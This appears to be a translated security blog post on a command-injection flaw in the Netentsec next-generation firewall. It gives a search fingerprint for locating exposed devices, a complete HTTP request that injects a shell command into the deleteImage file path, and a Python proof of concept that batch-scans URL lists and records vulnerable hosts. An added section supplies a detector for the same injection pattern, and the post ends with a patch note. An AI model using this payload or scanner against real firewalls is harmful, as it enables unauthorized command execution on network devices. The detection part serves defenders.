Disclaimer: The following script is offensive in nature. Do not use it illegally and do not perform unauthorized tests; you alone are responsible for the consequences.
1. Introduction
During the 2021 HW exercise, a remote command execution vulnerability was disclosed in the next-generation firewall (NGFW) of Beijing Netentsec Technology Co., Ltd. (网康). No vulnerability number for it has been found on CNVD, so CNVD has presumably not published it yet, but articles reproducing and analyzing the vulnerability are already available online.
2. Vulnerability Overview
The Netentsec Next-Generation Firewall (NGFW) is a high-performance application-layer firewall designed by Netentsec to respond to network threats. The NGFW contains a remote command execution vulnerability: an attacker who can reach the management interface can execute system commands by sending a specially crafted request.
3. Vulnerability principle
The vulnerable code is in HTML\applications\DirectData\controllers\directController.php.
For the vulnerability analysis, refer to: www.o2oxy.cn/3433.html
4. Affected versions
Version unknown (builds before 20210419)
5. Vulnerability level
High risk
6. Vulnerability reproduction
6.1 Reproduction on FOFA results
FOFA search keyword:
cert="11558588834859436962"
POST content (the body is a JSON RPC call whose file-path argument carries the injected command):

```http
POST /directdata/direct/router HTTP/1.1
Host: X.X.X.X
Connection: close
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=q885n85a5es9i83d26rm102sk3; ys-active_page=s%3A
Content-Type: application/x-www-form-urlencoded
Content-Length: 167

{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/.atest.txt;whoami >/var/www/html/atest.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}
```
6.2 netentsec_NGFW_RCE_POC.py
```python
#!/usr/bin/python
# Env: python3
# Author: afei00123
# -*- coding: utf8 -*-
import requests, urllib3, base64, time, json, argparse
from colorama import init

init(autoreset=True)


def title():
    print("")
    print('*'.center(60, '*'))
    print("Netentsec NGFW Next-generation Firewall (Version unknown)".center(30))
    print("github:https://github.com/ltfafei".center(50))
    print("gitee:https://gitee.com/afei00123".center(50))
    print("CSDN: afei00123.blog.csdn.net".center(50))
    print("Public account: Network operation and maintenance penetration".center(40))
    print("")
    print('*'.center(60, '*'))
    print("")


class netentsec_NGFW_POC():
    def NGFW_RCE_Check(self, url):
        urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
        target_url = f"{url}/directdata/direct/router"
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36",
            "Cache-Control": "max-age=0",
            "accept": "image/avif,image/webp,image/apng,image/*,*/*;q=0.8",
            "sec-ch-ua": '"Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"',
            "sec-ch-ua-mobile": "?0",
            "Upgrade-Insecure-Requests": "1",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
            "Sec-Fetch-Site": "none",
            "Sec-Fetch-Mode": "navigate",
            "Sec-Fetch-User": "?1",
            "Sec-Fetch-Dest": "document",
            "Accept-Encoding": "gzip, deflate",
            "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8",
            "Cookie": "PHPSESSID=q885n85a5es9i83d26rm102sk3; ys-active_page=s%3A",
            "Content-Type": "application/x-www-form-urlencoded",
        }
        # Base64 of the same JSON RPC body shown in 6.1, with the command replaced by an echo marker.
        payload = base64.b64decode("eyJhY3Rpb24iOiJTU0xWUE5fUmVzb3VyY2UiLCJtZXRob2QiOiJkZWxldGVJbWFnZSIsImRhdGEiOlt7ImRhdGEiOlsiL3Zhci93d3cvaHRtbC8uYXRlc3QudHh0O2VjaG8gYWZlaWNvbWUgPi92YXIvd3d3L2h0bWwvYXRlc3QudHh0Il19XSwidHlwZSI6InJwYyIsInRpZCI6MTcsImY4ODM5cDdycXRqIjoiPSJ9")
        try:
            s = requests.session()
            list_data = s.post(target_url, headers=headers, data=payload, verify=False, timeout=2).json()
            # The RPC reply is a list of results; success=True means the call was accepted.
            status = list_data[0]['result'].get("success")
            if status:
                print(f"\033[31m[+] {url} Remote command execution vulnerability is very likely!")
                with open("NGFW_RCE_vuln.txt", "a+") as f:
                    f.writelines(url + "\n")
        except Exception as e:
            print(f"[n] {url} There is no such vulnerability.")
        return url

    def NGFW_Batch_Check(self, url, file):
        if url:
            return True
        elif file:
            for url in file:
                url = url.replace('\n', '')
                time.sleep(1)
                self.NGFW_RCE_Check(url)


if __name__ == "__main__":
    title()
    parser = argparse.ArgumentParser(description="netentsec NGFW RCE POC")
    parser.add_argument(
        '-u', '--url', type=str, help='Please input target url. eg: https://ip:port'
    )
    parser.add_argument(
        '-f', '--file', type=argparse.FileType('r'),
        help='Please input urls file path. eg: c:\\urls.txt'
    )
    args = parser.parse_args()
    run_POC = netentsec_NGFW_POC()
    if args.file:
        run_POC.NGFW_Batch_Check(args.url, args.file)
        print("\n[done] Batch probe completed, please check: NGFW_RCE_vuln.txt")
    if args.url:
        run_POC.NGFW_RCE_Check(args.url)
```
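From the defender's side, the request in 6.1 and the probe in 6.2 share one signature: a POST to the directdata router whose SSLVPN_Resource.deleteImage path argument contains shell metacharacters. The following detection routine is an added example, not code from the original post; it assumes requests are available as (method, path, body) tuples from a proxy, WAF or access log, and the sample traffic is constructed.

```python
# Added detection example (not from the original post): flag requests that match
# the deleteImage command-injection pattern shown in 6.1 and 6.2.
import json
import re

ROUTER_PATH = "/directdata/direct/router"
# Shell metacharacters that never belong in a file path handed to deleteImage.
SHELL_META = re.compile(r"[;&|`$<>\n]|\$\(")

def classify_request(method, path, body):
    """Return (verdict, reason); verdict is rce_attempt, suspicious or benign."""
    if method != "POST" or path.rstrip("/") != ROUTER_PATH:
        return "benign", "not the directdata router endpoint"
    try:
        msg = json.loads(body)
    except (ValueError, TypeError):
        return "benign", "body is not JSON"
    for call in msg if isinstance(msg, list) else [msg]:  # envelope may batch calls
        if (not isinstance(call, dict) or call.get("action") != "SSLVPN_Resource"
                or call.get("method") != "deleteImage"):
            continue
        # The PoC nests the file path as data[0]["data"][0]; tolerate flat lists too.
        for arg in call.get("data") or []:
            paths = arg.get("data", []) if isinstance(arg, dict) else [arg]
            for p in paths:
                if isinstance(p, str) and SHELL_META.search(p):
                    return "rce_attempt", f"shell metacharacter in deleteImage path: {p!r}"
        return "suspicious", "SSLVPN_Resource.deleteImage called; review the path argument"
    return "benign", "other RPC call"

# Constructed sample traffic as (method, path, body). The second body has the
# shape of the write-up's payload with the command replaced by a harmless echo.
SAMPLE_REQUESTS = [
    ("GET", "/login", ""),
    ("POST", "/directdata/direct/router",
     '{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":'
     '["/var/www/html/.atest.txt;echo test >/var/www/html/atest.txt"]}],"type":"rpc","tid":17}'),
    ("POST", "/directdata/direct/router",
     '{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":'
     '["/var/www/html/images/logo.png"]}],"type":"rpc","tid":3}'),
]

def scan(records):
    """Return (path, verdict, reason) for every non-benign request in records."""
    hits = []
    for method, path, body in records:
        verdict, reason = classify_request(method, path, body)
        if verdict != "benign":
            hits.append((path, verdict, reason))
    return hits
```

Any legitimate deleteImage call still lands in the "suspicious" bucket, so the rule is best paired with an allowlist of the image directory the management UI actually writes to.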
6.3 netentsec_NGFW_RCE_EXP.py
Omitted here. Original address: blog.csdn.net/qq_41490561…
7. Fix
Contact the vendor to obtain and install the patch.